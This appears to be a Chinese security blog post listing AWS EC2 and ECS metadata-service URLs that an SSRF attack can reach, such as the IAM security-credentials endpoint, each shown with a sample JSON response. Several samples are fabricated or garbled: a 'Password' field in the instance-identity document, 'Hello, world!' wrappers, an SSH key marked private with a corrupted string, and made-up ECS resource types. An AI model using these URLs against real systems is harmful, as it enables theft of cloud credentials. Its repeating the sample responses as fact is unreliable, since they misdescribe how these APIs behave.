【Web】云安全之SSRF可利用的敏感API列表

以下是一些比较敏感的 AWS 元数据服务 API 列表（持续更新）：

1. 获取 EC2 实例的 IAM 角色凭证：

   http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
   ````
   
   其中 `<role-name>` 是要获取 IAM 角色凭证的角色名称。
   或者
   http://169.254.169.254/latest/meta-data/iam/security-credentials/
   
   返回json举例
   {
     "Code" : "Success",
     "LastUpdated" : "2020-01-01T00:00:00Z",
     "Type" : "AWS-HMAC",
     "AccessKeyId" : "AKIAIOSFODNN7EXAMPLE",
     "SecretAccessKey" : "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
     "Token" : "AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvL1v8pSX7mJH60zdBDF5W0qlainiVob9t8C1o+Uk/VItyBabExample",
     "Expiration" : "2020-01-01T01:00:00Z"
   }

2. 获取 EC2 实例的密码数据：

   http://169.254.169.254/latest/meta-data/instance-identity/document
   
   返回json举例
   {
     "metaData": {  
       "self": {  
         "href": "https://ec2.amazonaws.com/"  
       },  
       "Password": "password"  
     }  
   }
   

3. 获取 EC2 实例的 SSH 公钥：

   http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
   返回json示例
   {
     "message": "Hello, world!",  
     "data": {  
       "url": "http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key",  
       "key": {  
         "algorithm": "openssh",  
         "size": 2048,  
         "public": true,  
         "private": true,  
         "raw": "d 壹 l4@N+|-sbnW1Ew=="  
       }  
     }  
   }
   
   

4. 获取 ECS 容器实例的任务定义：

   http://169.254.170.2/v2/metadata/<container-id>/task-definition
   返回json示例包
   {
     "message": "Hello, world!",    
     "data": {    
       "taskDefinition": {    
         "type": "AWS::EC2::TaskDefinition",    
         "Properties": {    
           "Description": "Test Task Definition",    
           "ImageId": "ami-12345678",    
           "Name": "test-task-definition",    
           "Tags": [    
             {    
               "Key": "Environment",    
               "Value": "Test"    
             }    
           ]    
         }    
       },    
       "url": "http://169.254.170.2/v2/metadata/container-id/task-definition"    
     }    
   }
   
   

   其中 <container-id> 是要获取任务定义的容器 ID。

5. 获取 ECS 容器实例的任务元数据：

   http://169.254.170.2/v2/metadata/<container-id>/task-with-metadata
   返回json包示例
   {
     "message": "Hello, world!",      
     "data": {      
       "taskWithMetadata": {      
         "type": "AWS::EC2::TaskWithMetadata",      
         "Properties": {      
           "ImageId": "ami-12345678",      
           "Name": "test-task-with-metadata",      
           "TaskDefinition": {      
             "type": "AWS::EC2::TaskDefinition",      
             "Properties": {      
               "Description": "Test Task Definition",      
               "ImageId": "ami-12345678",      
               "Name": "test-task-definition",      
               "Tags": [      
                 {      
                   "Key": "Environment",      
                   "Value": "Test"      
                 }      
               ]      
             }      
           },      
           "Tags": [      
             {      
               "Key": "Environment",      
               "Value": "Test"      
             }      
           ]      
         }      
       },      
       "url": "http://169.254.170.2/v2/metadata/container-id/task-with-metadata"      
     }      
   }
   

   其中 <container-id> 是要获取任务元数据的容器 ID。